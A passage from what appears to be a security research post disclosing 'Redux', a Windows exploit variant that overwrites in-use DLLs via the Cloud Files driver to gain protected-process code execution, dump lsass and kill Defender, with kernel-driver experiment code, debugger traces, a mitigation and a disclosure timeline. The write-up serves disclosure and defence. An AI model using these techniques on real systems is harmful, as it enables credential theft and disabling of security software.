        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);

    bSuccessful = NT_SUCCESS(ntStatus);
    bReportResults = TRUE;

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentTwo complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;file backing a local SEC_IMAGE section for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    ReferenceDelete(pFileObject);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
}
</code></pre>
<p>Running this experiment yields the following output:</p>
<pre><code class="language-c">ExperimentTwo complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CANNOT open a file backing a local SEC_IMAGE section for FILE_WRITE_DATA. Status: 0xc0000043
</code></pre>
<p>In this case, <code>IoCreateFileEx</code> failed with <code>0xC0000043</code> (<code>STATUS_SHARING_VIOLATION</code>) because files mapped as executable images have additional protections to ensure they remain immutable, even without any open handles. You can see this check using the <code>MmFlushImageSection</code> API in the <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593">Microsoft FastFat sample driver code</a>, but it exists in other file systems as well, including NTFS:</p>
<pre><code class="language-c">//
//  If the user wants write access access to the file make sure there
//  is not a process mapping this file as an image.  [ ... ]
//
if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {

    [ ... ] 
    
    if (!MmFlushImageSection( &amp;Fcb-&gt;NonPaged-&gt;SectionObjectPointers,
                              MmFlushForWrite )) {

        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
                                      STATUS_SHARING_VIOLATION;
        try_return( Iosb );
    }
}
</code></pre>
<p>The <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> flag bypasses I/O manager checks, but not the <code>MmFlushImageSection</code> check in the filesystem. Re-reading the description of <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>, it’s obvious in hindsight:</p>
<blockquote>
<p>IO_IGNORE_SHARE_ACCESS_CHECK<br />
The I/O manager should not perform share-access checks on the file object after it is created. <em>However, the file system might still perform these checks.</em></p>
</blockquote>
<p>ExperimentTwo isn’t exactly a fair representation of PPLFault, which loads the DLL from a network drive. When a network client opens a file on a server, the SMB client driver allocates a File Control Block (<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/the-fcb-structure">FCB</a>) structure representing that logical file. Correspondingly, the server opens the file with the requested share modes and allocates its own FCB. This means that there’s two distinct FCBs in play with different semantics. When the client maps a DLL into memory as an executable, the resulting <code>SEC_IMAGE</code> file mapping (aka section) is associated with its FCB so it gains the protection of <code>MmFlushImageSection</code>. The server does not correspondingly create an image section, so its FCB gains no such protection. PPLFault exploits this difference by performing the writes to the server’s FCB, bypassing the <code>MmFlushImageSection</code> check.</p>
<p>Let’s try this out in ExperimentThree:</p>
<pre><code class="language-c">/*
* This experiment shows that a file loaded as a DLL by an SMB client can't be modified
* server-side unless IO_IGNORE_SHARE_ACCESS_CHECK is used.
*/
VOID ExperimentThree()
{
    DECLARE_CONST_UNICODE_STRING(filePathLocal, 
        L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);
    DECLARE_CONST_UNICODE_STRING(filePathSMB, 
        L&quot;\\Device\\Mup\\127.0.0.1\\c$\\Windows\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    OBJECT_ATTRIBUTES sectionObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;

    ntStatus = MapFileAsImageSection(
        &amp;filePathSMB, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePathSMB, ntStatus);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, 
    // close the file and section handles to remove them from the equation.
    // We're trying to test whether IO_IGNORE_SHARE_ACCESS_CHECK can bypass the 
    // MmFlushImageSection check here:
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, 
        (PUNICODE_STRING)&amp;filePathLocal, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    bReportResults = TRUE;

    // Can IoCreateFileEx() open a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        0,
        NULL);
    if (NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: IoCreateFileEx(FILE_WRITE_DATA) unexpectedly succeeded &quot;
            &quot;on a file mapped as SEC_IMAGE remotely by an SMB client\n&quot;);
        ntStatus = STATUS_UNSUCCESSFUL;
        goto Cleanup;
    }

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open
    // a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;fileObjAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);

    bSuccessful = NT_SUCCESS(ntStatus);
    bReportResults = TRUE;

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;file backing a remote SEC_IMAGE view for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
}
</code></pre>
<p>ExperimentThree generates the following output:</p>
<pre><code class="language-c">ExperimentThree complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CAN open a file backing a remote SEC_IMAGE view for FILE_WRITE_DATA. Status: 0x00000000
</code></pre>
<p>ExperimentThree above shows how kernel drivers are able to modify DLLs mapped by SMB clients by using the <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> flag on the server’s version of that file.</p>
<h2>Roll up your sleeves</h2>
<p>We’ve just shown what’s possible, but we still don’t know what Cloud Files is actually doing. Let’s dig deeper into the Process Monitor output to answer the questions raised earlier.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image4.png" alt="" /></p>
<p>Earlier, we asked two questions:</p>
<blockquote>
<p><strong>Violation of Immutability</strong><br />
We see a successful write operation to a file while it is loaded as an executable image. In our <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">earlier FFI research</a>, we discussed the <code>MmFlushImageSection</code> check in the file system, which is designed to protect against this very situation. <em>How did it bypass this check?</em></p>
<p><strong>Violation of the File Access Model</strong><br />
We can see that PPLFault successfully overwrote the file. Microsoft documentation for WriteFile <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile">states</a> that the file should have been opened with write access, meaning <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants"><code>FILE_WRITE_DATA</code></a>, but the output shows it was opened for “Read Attributes, Write Attributes, Synchronize,” which is <code>FILE_READ_ATTRIBUTES</code>, <code>FILE_WRITE_ATTRIBUTES</code>, and <code>SYNCHRONIZE</code>. <em>Without <code>FILE_WRITE_DATA</code>, how did it overwrite this file?</em></p>
</blockquote>
<p>We can easily explain the <code>MmFlushImageSection</code> bypass. That check <a href="https://github.com/microsoft/Windows-driver-samples/blob/9607307c5bfcc68ca9f0acdfcc2f0c8c2584897d/filesys/fastfat/create.c#L3581">looks for</a> <code>FILE_WRITE_DATA</code>, which wasn’t used here. The file was only opened for “Read Attributes, Write Attributes, Synchronize.”  We can’t explain the violation of the file access model, however. How did it overwrite a non-writable file?  Let’s zoom in on the call stack for that <code>WriteFile</code> operation to try to find out.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image3.png" alt="Call stack for PPLFault file write operation" title="Call stack for PPLFault file write operation" /></p>
<p>In the call stack, we can see <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L176">line 176 of <code>PPLFault.cpp</code></a> calling <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/nf-cfapi-cfexecute"><code>cldapi.dll!CfExecute</code></a> (rows 24-25) from user-mode. This eventually results in <code>cldflt.sys!HsmiRecallWriteFileNoLock</code> calling <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefileex"><code>FltWriteFileEx</code></a>. <code>FltWriteFileEx</code> is somehow able to write to a file that’s not opened for write access. Let’s attach a kernel debugger and take a closer look.</p>
<p>Setting a breakpoint on <code>FltWriteFileEx</code> and re-running the exploit, we can break at the call from <code>HsmiRecallWriteFileNoLock</code>:</p>
<pre><code class="language-shell">2: kd&gt; bp fltmgr!FltWriteFileEx
2: kd&gt; g
Breakpoint 0 hit
FLTMGR!FltWriteFileEx:
fffff800`425aad40 4055            push    rbp
0: kd&gt; k
 # Child-SP          RetAddr               Call Site
00 ffffb90e`faa968e8 fffff800`5c2878d3     FLTMGR!FltWriteFileEx
01 ffffb90e`faa968f0 fffff800`5c2b2ccc     cldflt!HsmiRecallWriteFileNoLock+0x2df
02 ffffb90e`faa969f0 fffff800`5c2b25f8     cldflt!HsmRecallTransferData+0x25c
03 ffffb90e`faa96aa0 fffff800`5c2b35d7     cldflt!CldStreamTransferData+0x65c
04 ffffb90e`faa96bd0 fffff800`5c27196c     cldflt!CldiSyncTransferOrAckDataByObject+0x4c7
05 ffffb90e`faa96cb0 fffff800`5c2bb568     cldflt!CldiSyncTransferOrAckData+0xdc
06 ffffb90e`faa96d10 fffff800`5c2bafe1     cldflt!CldiPortProcessTransferData+0x46c
07 ffffb90e`faa96db0 fffff800`5c27895a     cldflt!CldiPortProcessTransfer+0x291
08 ffffb90e`faa96e50 fffff800`4259530a     cldflt!CldiPortNotifyMessage+0xd9a
09 ffffb90e`faa96f70 fffff800`425cf299     FLTMGR!FltpFilterMessage+0xda
0a ffffb90e`faa96fd0 fffff800`42597e60     FLTMGR!FltpMsgDispatch+0x179
0b ffffb90e`faa97040 fffff800`3eaebef5     FLTMGR!FltpDispatch+0xe0
0c ffffb90e`faa970a0 fffff800`3ef40060     nt!IofCallDriver+0x55
0d ffffb90e`faa970e0 fffff800`3ef41a90     nt!IopSynchronousServiceTail+0x1d0
0e ffffb90e`faa97190 fffff800`3ef41376     nt!IopXxxControlFile+0x700
0f ffffb90e`faa97380 fffff800`3ec2bbe8     nt!NtDeviceIoControlFile+0x56
10 ffffb90e`faa973f0 00007ffe`b074f454     nt!KiSystemServiceCopyEnd+0x28
11 000000dc`e7bff448 00007ffe`99383ca2     ntdll!NtDeviceIoControlFile+0x14
12 000000dc`e7bff450 00007ffe`99383251     FLTLIB!FilterpDeviceIoControl+0x136
13 000000dc`e7bff4c0 00007ffe`94f3b12b     FLTLIB!FilterSendMessage+0x31
14 000000dc`e7bff510 00007ffe`94f36059     cldapi!CfpExecuteTransferData+0x103
15 000000dc`e7bff690 00007ff7`ac9216e0     cldapi!CfExecute+0x349
16 000000dc`e7bff730 00000029`8969cee4     PPLFault!FetchDataCallback+0x4b0 [C:\git\PPLFault\PPLFault\PPLFault.cpp @ 176] 

</code></pre>
<p>Let’s see what kind of access was granted to the handle (~= <code>FILE_OBJECT</code>) which resides in the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefileex">second parameter</a> to <code>FltWriteFileEx</code>. On x64, this is <code>rdx</code>.</p>
<pre><code class="language-shell">0: kd&gt; dt _FILE_OBJECT @rdx ReadAccess WriteAccess DeleteAccess SharedRead SharedWrite SharedDelete Flags
ntdll!_FILE_OBJECT
   +0x04a ReadAccess   : 0 ''
   +0x04b WriteAccess  : 0 ''
   +0x04c DeleteAccess : 0 ''
   +0x04d SharedRead   : 0 ''
   +0x04e SharedWrite  : 0 ''
   +0x04f SharedDelete : 0x1 ''
   +0x050 Flags        : 0x4000a
0: kd&gt; !fileobj @rdx

Device Object: 0xffffa909953848f0   \Driver\volmgr
Vpb: 0xffffa90995352ee0
Event signalled
Access: SharedDelete 

Flags:  0x4000a
	Synchronous IO
	No Intermediate Buffering
	Handle Created

FsContext: 0xffffcf04ac4c6170	FsContext2: 0xffffcf04a7d1cad0
CurrentByteOffset: 0
Cache Data:
  Section Object Pointers: ffffa90999f44378
  Shared Cache Map: 00000000


File object extension is at ffffa9099a4c5f40:

	Flags:	00000001
		Ignore share access checks.
</code></pre>
<p>We can see the file wasn’t opened for write access, and “Ignore share access checks” sounds a lot like <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>. Let’s sanity-check the <code>ByteOffset</code> and <code>Length</code> parameters, which are the third and fourth parameters to <code>FltWriteFileEx</code>, stored in <code>r8</code> and <code>r9</code> respectively.</p>
<pre><code>0: kd&gt; dx ((PLARGE_INTEGER)@r8)-&gt;QuadPart
((PLARGE_INTEGER)@r8)-&gt;QuadPart : 0 [Type: __int64]
0: kd&gt; dx (int)@r9
(int)@r9         : 90112 [Type: int]
</code></pre>
<p>A write of <code>90,112</code> bytes at offset <code>0</code> - that lines up with the ProcMon output. What about <code>Flags</code>, the 6th parameter?</p>
<pre><code>0: kd&gt; dx *(PULONG)(@rsp+(8*6))
*(PULONG)(@rsp+(8*6)) : 0xa [Type: unsigned long]
</code></pre>
<p><code>0xA</code> is <code>0x2 | 0x8</code>, which is <code>FLTFL_IO_OPERATION_PAGING</code> | <code>FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING</code>. This lines up with “Paging I/O, Synchronous Paging I/O” we saw in ProcMon.</p>
<p>Let’s see if we can reproduce this in a driver. We’re going to open a locally-mapped DLL like we did in ExperimentTwo, but instead of asking for <code>FILE_WRITE_DATA</code>, we’re going to stick to the same permissions as CloudFiles: <code>SYNCHRONIZE</code> | <code>FILE_READ_ATTRIBUTES</code> | <code>FILE_WRITE_ATTRIBUTES</code>. This won’t trip the <code>MmFlushImageSection</code> check which looks for <code>FILE_WRITE_DATA</code>, but we’ll throw in <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> anyway to more closely replicate CloudFiles’ behavior. Next, we’ll use <code>FltWriteFileEx</code> to perform a synchronous paging write to the non-writable <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_file_object">FILE_OBJECT</a>.</p>
<p>We’re omitting some helper code for brevity. All the example code in this article is available on our <a href="https://github.com/gabriellandau/BlogExamples/tree/main/Redux/FileTestDriver">GitHub</a>.</p>
<pre><code class="language-c">VOID ExperimentFour()
{
    DECLARE_CONST_UNICODE_STRING(filePath,
        L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;
    PFILE_OBJECT pFileObject = NULL;
    PFLT_INSTANCE pInstance = NULL;
    PFLT_VOLUME pVolume = NULL;
    LARGE_INTEGER byteOffset{};
    ULONG bytesWritten = 0;

    ntStatus = MapFileAsImageSection(
        &amp;filePath, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    // Find our own minifilter instance for the volume containing this file
    // We'll need it later
    ntStatus = GetMyInstanceForFile(hFile, &amp;pVolume, &amp;pInstance);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: GetMyInstanceForFile failed with NTSTATUS 0x%08x\n&quot;,
            ntStatus);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, 
    // close the file and section handles because that's what ntdll does
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, 
        (PUNICODE_STRING)&amp;filePath, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Open the file without FILE_WRITE_DATA
    // cldflt.sys!HsmiOpenFile uses this instead of IoCreateFileEx
    ntStatus = FltCreateFileEx2(
        gpFilter,
        NULL,
        &amp;hFile2,
        &amp;pFileObject,
        SYNCHRONIZE | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES,
        &amp;fileObjAttr, &amp;iosb, NULL, 0,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_NO_INTERMEDIATE_BUFFERING | FILE_SYNCHRONOUS_IO_NONALERT | 
        FILE_NON_DIRECTORY_FILE | FILE_OPEN_REPARSE_POINT,
        NULL, 0,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour: IoCreateFileEx failed with NTSTATUS 0x%08x\n&quot;,
            ntStatus);
        goto Cleanup;
    }

    // cldflt.sys is using FltWriteFileEx with synchronous paging I/O
    ntStatus = FltWriteFileEx(
        pInstance, pFileObject, &amp;byteOffset,
        sizeof(gZeroBuf), gZeroBuf,
        FLTFL_IO_OPERATION_PAGING | FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING, 
        &amp;bytesWritten, NULL, NULL, NULL, NULL);

    // If FltWriteFileEx returns success without us passing FILE_WRITE_DATA, 
    // then we have succeeded
    bSuccessful = NT_SUCCESS(ntStatus) &amp;&amp; (sizeof(gZeroBuf) == bytesWritten);
    bReportResults = TRUE;
    
Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentFour complete. &quot;
            &quot;FltWriteFileEx %s be used to write to a non-writable FILE_OBJECT &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hSection);
    HandleDelete(hFile2);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }
    ReferenceDelete(pFileObject);
    if (pInstance) FltObjectDereference(pInstance);
    if (pVolume) FltObjectDereference(pVolume);
}
</code></pre>
<p>This experiment yields the following output:</p>
<pre><code class="language-c">ExperimentFour complete. FltWriteFileEx CAN be used to write to a non-writable FILE_OBJECT Status: 0x00000000
</code></pre>
<p>This proves that <code>FltWriteFileEx</code> can be used to break several rules. There’s a key difference between PPLFault and this experiment: The experiment succeeded without any network redirectors, proving that CloudFiles alone can modify in-use executables, regardless of whether they are mapped locally or via SMB. More abstractly, it proves that <em>FFI exploitation via CloudFiles may be possible without network redirectors</em>.</p>
<h2>A new exploit</h2>
<p><a href="https://x.com/GabrielLandau/status/1757818200127946922">Microsoft’s PPLFault mitigation</a> specifically targets executables loaded over network redirectors. Can we apply what we’ve discovered here to achieve the same effect sans network redirector?</p>
<p>When CI requests the DLL for signature verification, PPLFault uses <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L132-L136"><code>CfExecute</code></a> to write to (rehydrate) the placeholder from its <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/ne-cfapi-cf_callback_type#constants">fetch data callback</a>. Once the original file has been served up for signature verification, it switches over to the payload, <a href="https://github.com/gabriellandau/PPLFault/blob/c835f98faf596ab9f2ceb362b30a79a1b4808888/PPLFault/PPLFault.cpp#L138-L187">calling CfExecute a second time</a> during the same callback to overwrite a portion of the file with a payload. Tweaking PPLFault to have the victim load the DLL locally instead of over loopback SMB, the second call to <code>CfExecute</code> fails with “The cloud operation was canceled by user.”  We needed another approach.</p>
<pre><code class="language-shell">C:\Users\user\Desktop&gt;PPLFault.exe 760 services.dmp
 [+] Ready. Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [!] CfExecute #2 failed with HR 0x8007018e: The cloud operation was canceled by user.
 [!] Did not find expected dump file: services.dmp
</code></pre>
<p>After some reverse engineering, we learned that the failure was due to checks within CloudFilter itself, not from its interactions with the I/O manager or filesystem. We discovered that calling <a href="https://learn.microsoft.com/en-us/previous-versions/mt827480(v=vs.85)"><code>CfDehydratePlaceholder</code></a> then calling <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/nf-cfapi-cfhydrateplaceholder"><code>CfHydratePlaceholder</code></a> from a different thread (outside of the rehydration callback) would reset the state of our file inside the CloudFilter driver, causing it to re-invoke our our rehydration callback. This allowed us to overwrite the in-use DLL with our payload and achieve arbitrary code execution as WinTcb-Light. This small code change resurrected PPLFault, so we named the variant Redux.</p>
<p>We similarly resurrected <a href="https://github.com/gabriellandau/PPLFault?tab=readme-ov-file#godfault">GodFault</a>, leveraging our highly-privileged PPL access to compromise kernel memory and bypass Windows Defender’s process protections, terminating a normally-unkillable process.</p>
<p>You can find our PoCs for Redux and GodFault-Redux on <a href="https://github.com/gabriellandau/Redux">GitHub</a>.</p>
<p>The video below shows the following on fully-updated Windows Server 2022 (February 2026 version 20348.4773).</p>
<ol>
<li>PPLFault failing to dump <a href="https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service"><code>lsass</code></a></li>
<li>Redux successfully dumping <code>lsass</code></li>
<li>An administrator failing to terminate <code>MsMpEng.exe</code> because it is PPL</li>
<li>GodFault-Redux successfully terminating <code>MsMpEng.exe</code></li>
</ol>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe src=&quot;https://www.youtube.com/embed/e5OYMXfx84E?si=P4jnGWs8QWo7AbY-&amp;vq=hd1080&quot; title=&quot;YouTube video player&quot; allow=&quot;fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Mitigation</h2>
<p>In our report to MSRC, we provided a filesystem minifilter that mitigates Redux by blocking <code>IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION</code> operations meeting all of the following criteria:</p>
<ul>
<li>The requestor is a PPL.</li>
<li>The requestor's <code>PreviousMode</code> is <code>UserMode</code>.</li>
<li>The page protection is executable (e.g. <code>PAGE_EXECUTE_READ</code>) or the allocation attributes contain <code>SEC_IMAGE</code>.</li>
<li>The file has a <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c8e77b37-3909-4fe6-a4ea-2b9d423b1ee4">Cloud Filter reparse tag</a> such as <code>IO_REPARSE_TAG_CLOUD</code>.</li>
</ul>
<p>A mitigation is built into Elastic Defend versions 8.14 and newer.  If your fleet runs any affected operating systems, you can set the following in <a href="https://www.elastic.co/kr/docs/solutions/security/configure-elastic-defend/configure-an-integration-policy-for-elastic-defend#adv-policy-settings">Defend Advanced Policy</a> to enable it.</p>
<pre><code>windows.advanced.flags: e931849d52535955fcaa3847dd17947b
</code></pre>
<p>With this mitigation in place, the exploit is blocked:</p>
<pre><code class="language-shell">C:\Users\user\Desktop&gt;Redux 624 services.dmp
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [!] SpawnPPL: WaitForSingleObject returned 258.  Expected WAIT_OBJECT_0.  GLE: 2
 [!] Did not find expected dump file: services.dmp
</code></pre>
<p>Simultaneously, Windows displays a popup with the <code>STATUS_ACCESS_DENIED (0xC0000022)</code> status code.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image1.png" alt="A popup showing the mitigation blocking the Redux exploit." title="A popup showing the mitigation blocking the Redux exploit." /></p>
<p>You can find our PoC for the mitigation on <a href="https://github.com/gabriellandau/Redux/tree/main/NoFault">GitHub</a>.</p>
<h2>Disclosure and Remediation</h2>
<p>The disclosure timeline is as follows:</p>
<ul>
<li>2024-02-14 We reported Redux to MSRC.</li>
<li>2024-02-29 The Windows Defender team reached out to coordinate disclosure.</li>
<li>2024-10-01 Windows 11 24H2 reached GA with the mitigation.</li>
</ul>
<p>When we disclosed Redux to MSRC, it was functional against fully-patched versions of Windows 11, but not against the experimental Insider Canary build 25936. While discussing the issue with the Windows Defender team, we learned that (now former) Microsoft Senior Security Researcher <a href="https://x.com/PhilipTsukerman">Philip Tsukerman</a> had discovered it while looking for variants of PPLFault, with the fix still in pre-release testing.</p>
<p>The table below shows affected and fixed versions of Windows as of the date of publication.</p>
<table>
<thead>
<tr>
<th align="left">Operating System</th>
<th align="left">Lifecycle</th>
<th align="left">Fix Status</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Windows 11 24H2</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-11-home-and-pro">Mainstream Support</a></td>
<td align="left">✔ Fixed</td>
</tr>
<tr>
<td align="left">Windows 10 Enterprise LTSC 2021</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-10-enterprise-ltsc-2021">Mainstream Support</a></td>
<td align="left">❌ Still functional as of February 2026 (19044.6937)</td>
</tr>
<tr>
<td align="left">Windows Server 2025</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2025">Mainstream Support</a></td>
<td align="left">✔ Fixed</td>
</tr>
<tr>
<td align="left">Windows Server 2022</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2022">Mainstream Support</a></td>
<td align="left">❌ Still functional as of February 2026 (20348.4773)</td>
</tr>
<tr>
<td align="left">Windows Server 2019</td>
<td align="left"><a href="https://learn.microsoft.com/en-us/lifecycle/products/windows-server-2019">Extended Support</a></td>
<td align="left">❌ Still functional as of February 2026 (17763.8389)</td>
</tr>
</tbody>
</table>
<h2>Conclusion</h2>
<p>In 2024, we disclosed a new Windows vulnerability class, False File Immutability (FFI), demonstrating it with the release of two distinct kernel exploits: <a href="https://github.com/gabriellandau/PPLFault">PPLFault</a> and <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">ItsNotASecurityBoundary</a>. Both exploits leverage network redirectors to exploit design flaws in Windows Code Integrity. In this research, we showcased and <a href="https://github.com/gabriellandau/Redux">released</a> another exploit which demonstrates how to exploit FFI without network redirectors. We believe that this was the third FFI exploit when it was reported in February 2024; there have since been at least <a href="https://project-zero.issues.chromium.org/issues/42451731">two</a> <a href="https://project-zero.issues.chromium.org/issues/42451731">more</a>.</p>
<p>Redux is not the end of FFI; there are more exploitable FFI vulnerabilities.</p>
]]></content:encoded>
            <category>security-labs</category>
